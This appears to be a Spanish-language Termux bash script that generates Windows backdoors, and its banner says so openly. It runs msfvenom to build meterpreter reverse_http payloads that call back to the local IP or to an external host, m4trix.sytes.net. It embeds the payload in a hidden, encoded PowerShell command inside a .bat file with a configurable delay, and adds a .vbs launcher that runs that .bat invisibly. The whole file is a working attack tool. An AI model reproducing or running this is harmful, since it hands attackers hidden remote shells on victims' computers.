#!/data/data/com.termux/files/usr/bin/bash

#ipp="$(curl ifconfig.co)"  > /dev/null 2>&1

############  Colores  #################
rojff='\033[1;31m'
rojx='\e[101m'
rojs='\e[41m'
roj='\033[31m'
ro2='\033[91m'
rojsub='\e[1;4;91m'

ver='\033[32m'
#ver0='\033[1;32m'
ve2='\033[92m'
#ve20='\033[1;32m'

ama='\033[33m'
amas='\033[1;4;33m'
am0='\033[1;33m'

azu='\033[34m'
az0='\033[1;34m'
neg='\e[1m'
pur='\033[35m'

cy='\033[36m'
#cy0='\033[1;36m'
##---------------
sub='\e[4m'
#fos='\e[5m'
gri='\e[2m'
#----------------
fin='\033[01;37m'
#----------------
#c0lorx="$(sh /xg/0r/.betas/i/colorxx2)"

#h0ra2="$(sh /xg/0r/.betas/i/color2)"
########     Fin Colores ##############----

#c00l="$(sh /xg/0r/.betas/i/color)"
#bannc0l="$(sh /xg/0r/.betas/i/colorbanner)"
########     Fin Colores ##############----

#------------------------------------------------------------
#########   Fechas/hora   ############
diasem="$(date +%A)"
mes="$(date +%B)"
diafech="$(date +%e)"
ttime="$(date +'%I:%M')"
tt2="$(date +%e)"
tt3="$(date +%M)"
#timwe="$(date +'%I::%M')"
ye="$(date +%Y)"
######################################
#-------------------------------------------

########################### ip/red ####################

ip="$(ip route show|grep ' src ' |cut -d' ' -f12)"
#ant3=`netstat -r | grep "default" | awk {'print $8'}`
#nomred="$(nmcli c|sed -n '2p'|cut -d' ' -f1)"
#ipx=$(hostname -I)
#routt="$(ip route show|grep ' dhcp '|cut -d' ' -f3)"
#####################################


banner0 () {
	rm -f /data/data/com.termux/files/home/99/0/x01 > /dev/null 2>&1
#cd /data/data/com.termux/files/home/99/0/x1
rm -f *.bat > /dev/null 2>&1
rm -f *.vbs > /dev/null 2>&1
	echo ""
clear
echo "
$roj
▄▄▄▄·  ▄▄▄· ▄▄▄▄▄▐▄• ▄ 
▐█ ▀█▪▐█ ▀█ •██   █▌█▌▪
▐█▀▀█▄▄█▀▀█  ▐█.▪ ·██· 
██▄▪▐█▐█ ▪▐▌ ▐█▌·▪▐█·█▌
·▀▀▀▀  ▀  ▀  ▀▀▀ •▀▀ ▀▀ $fin


Ｃｒｅａｎｄｏ ｕｎ \033[33m．Ｂａｔ$fin ｃｏｍｏ 
Ｆｕｔｕｒｏ [ＢａｃｋＤｏｏｒ]
Ｕｓａｎｄｏ　[\033[31m．ｖｂｓ$fin]"
}


ppreg0 () {
echo "
$ama ᗪEᑎTᖇO ᗪE ᒪᗩ ᖇEᗪ$fin┌─┤$ama Windows_x32-bits....\033[32m1$fin
                 │
                 └─┤$ama Windows_x64-bits....\033[32m2$fin     

$roj ᖴᑌEᖇᗩ ᗪE ᒪᗩ ᖇEᗪ$fin┌─┤$roj Windows_x32-bits.....\033[32mx1$fin
                │
                └┤$roj Windows_x64-bits.....\033[32mx2$fin  
"
echo -n "───────────────┤"
read redd
case $redd in
  1 ) banner0;ppreg;ddentr0x32;final;;
  2 ) banner0;ppreg;ddentr0x64;final;;
  x1 ) banner0;ppreg;ffuera0x32;final;;
  x2 ) banner0;ppreg;ffuera0x64;final;;
  * ) sleep 0.6s; echo "[1;31m
 Opción incorrecta";sleep 1; clear; inici0;;
esac
}

ppreg () {

echo  "──────────────
──────────────
  Ｎｏｍｂｒａ"　
echo -n "ｔｕ　（．ｖｂｓ）:$roj"
read vbsx

sleep 1s
echo "$fin

"
echo  "Ｐｕｅｒｔｏ░"
echo -n "ᗪｅ░ＳｈｅｌｌＣｏｄｅ:: "
read p00r
echo "
---------------------------------------------
---------------------------------------------

Λｇｒｅａｇａｒ Segundos 
ａ ＴｉｍｅＯｕｔ．ｅｘｅ
  Opciones::: $roj 
  10min=600 15min=900 20min=1200
$ama
30min=1800  1hra=3600  3hras=10800
$fin
"
echo -n "└──────╼#"
read ttiemp
#clear
#echo "$ama
#   1   $roj    2 $ama
#ᗪEᑎTᖇO$fin ó$roj ᖴᑌEᖇᗩ $fin"
#echo -n "De la ᖇed:::"
clear
echo "

░█▀▀█ █▀▀█ █▀▀ █▀▀█ █▀▀▄ █▀▀▄ █▀▀█ ▄ 
░█─── █▄▄▀ █▀▀ █▄▄█ █──█ █──█ █──█ ─ 
░█▄▄█ ▀─▀▀ ▀▀▀ ▀──▀ ▀──▀ ▀▀▀─ ▀▀▀▀ ▀ 

$ama░█▀▀█ █▀▀█ █──█ █── █▀▀█ █▀▀█ █▀▀▄ $fin
$ama░█▄▄█ █▄▄█ █▄▄█ █── █──█ █▄▄█ █──█ $fin
$ama░█─── ▀──▀ ▄▄▄█ ▀▀▀ ▀▀▀▀ ▀──▀ ▀▀▀─$fin

"
} 
ddentr0x32 () {    msfvenom -p windows/meterpreter/reverse_http LHOST=$ip LPORT=$p00r HandlerSSLCert=/data/data/com.termux/files/home/99/ban/www.gmail.com.pem StagerVerifySSLCert=true -f psh-cmd > /data/data/com.termux/files/home/99/0/x1/mtx.raw



}
ddentr0x64 () {    msfvenom -p windows/x64/meterpreter/reverse_http LHOST=$ip LPORT=$p00r HandlerSSLCert=/data/data/com.termux/files/home/99/ban/www.gmail.com.pem StagerVerifySSLCert=true -f psh-cmd > /data/data/com.termux/files/home/99/0/x1/mtx.raw
 }


ffuera0x32 () {    msfvenom -p windows/meterpreter/reverse_http LHOST=m4trix.sytes.net LPORT=$p00r HandlerSSLCert=/data/data/com.termux/files/home/99/ban/www.gmail.com.pem StagerVerifySSLCert=true -f psh-cmd > /data/data/com.termux/files/home/99/0/x1/mtx.raw
  }
  ffuera0x64 () {    msfvenom -p windows/x64/meterpreter/reverse_http LHOST=m4trix.sytes.net LPORT=$p00r HandlerSSLCert=/data/data/com.termux/files/home/99/ban/www.gmail.com.pem StagerVerifySSLCert=true -f psh-cmd > /data/data/com.termux/files/home/99/0/x1/mtx.raw
}


final() {

 touch /data/data/com.termux/files/home/99/0/x01
  shellx=`cat /data/data/com.termux/files/home/99/0/x1/mtx.raw | awk {'print $12'}`
  echo "powershell.exe -nop -wind hidden -Exec Bypass -noni -enc $shellx" >> /data/data/com.termux/files/home/99/0/x01
  cd /data/data/com.termux/files/home/99/0/x1
  rm -f *.raw

#########################

touch /data/data/com.termux/files/home/99/0/x1/x0.bat
echo "@echo off" >> /data/data/com.termux/files/home/99/0/x1/x0.bat
 echo "echo." >> /data/data/com.termux/files/home/99/0/x1/x0.bat
 echo "echo." >> /data/data/com.termux/files/home/99/0/x1/x0.bat
 echo "timeout  $ttiemp"  >> /data/data/com.termux/files/home/99/0/x1/x0.bat
  echo "echo." >>/data/data/com.termux/files/home/99/0/x1/x0.bat
   echo "echo." >> /data/data/com.termux/files/home/99/0/x1/x0.bat
cat /data/data/com.termux/files/home/99/0/x01  >> /data/data/com.termux/files/home/99/0/x1/x0.bat
rm -f /data/data/com.termux/files/home/99/0/x01 > /dev/null 2>&1

touch /data/data/com.termux/files/home/$p00r
bata="/data/data/com.termux/files/home/99/0/x1/x0.bat"
#clear
  


                                            if [ -e $bata ]; then



                          echo " $ama       

     [☠] Ｓｃｒｉｐｔ．ｂａｔ $azu :::Creado!!
                          
                          "
                                            else
      echo  "       [☠] archivo.bat     -> Not Encontrado!"
                                            exit
                                            fi

echo "..............................................."
touch /data/data/com.termux/files/home/99/0/x1/$vbsx.vbs

echo 'Set WshShell = CreateObject("WScript.Shell")' >> /data/data/com.termux/files/home/99/0/x1/$vbsx.vbs
echo 'WshShell.Run chr(34) & "x0.bat" & Chr(34), 0' >> /data/data/com.termux/files/home/99/0/x1/$vbsx.vbs
echo "Set WshShell = Nothing" >> /data/data/com.termux/files/home/99/0/x1/$vbsx.vbs
batta="/data/data/com.termux/files/home/99/0/x1/$vbsx.vbs"
#clear 
  


                                            if [ -e $batta ]; then



                          echo "       

   $ver  Ｓｃｒｉｐｔ．vbs $ama :::Creado!!



                          "
                                            else
      echo  "       [☠] archivo.bat     -> Not Encontrado!"
                                            exit
                                            fi




}








#n0mb=$(zenity --title="☠ Ｕｓｕａｒｉｏ ☠" --text ":::Escribe tu Nombre de Usuario en GitHub:::" --entry --width 100) > /dev/null 2>&1

#ppsx=$(zenity  --file-selection --title="Selecciona un Archivo Para Subir a GitHub:::::::")  > /dev/null 2>&1
#ppsx=$(zenity  --file-selection --title="Selecciona un Archivo Para Subir a GitHub::::::: "--directory)  > /dev/null 2>&1

#read varr

#####################################
#    case $kaos in
#	     a ) clear; banne1;;
#	     z ) sleep 1; exit;;
#	     * ) sleep 1; echo "[1;31m
#  Opción incorrecta";sleep 1; clear; enterchaoss;;
#    esac
####################################
# > /dev/null 2>&1
#
###################################
#  if [ $varr = "1" ]; then
#clear
#	 echo "
#
#"
#else
#echo ""
#fi
####################################
banner0 && ppreg0
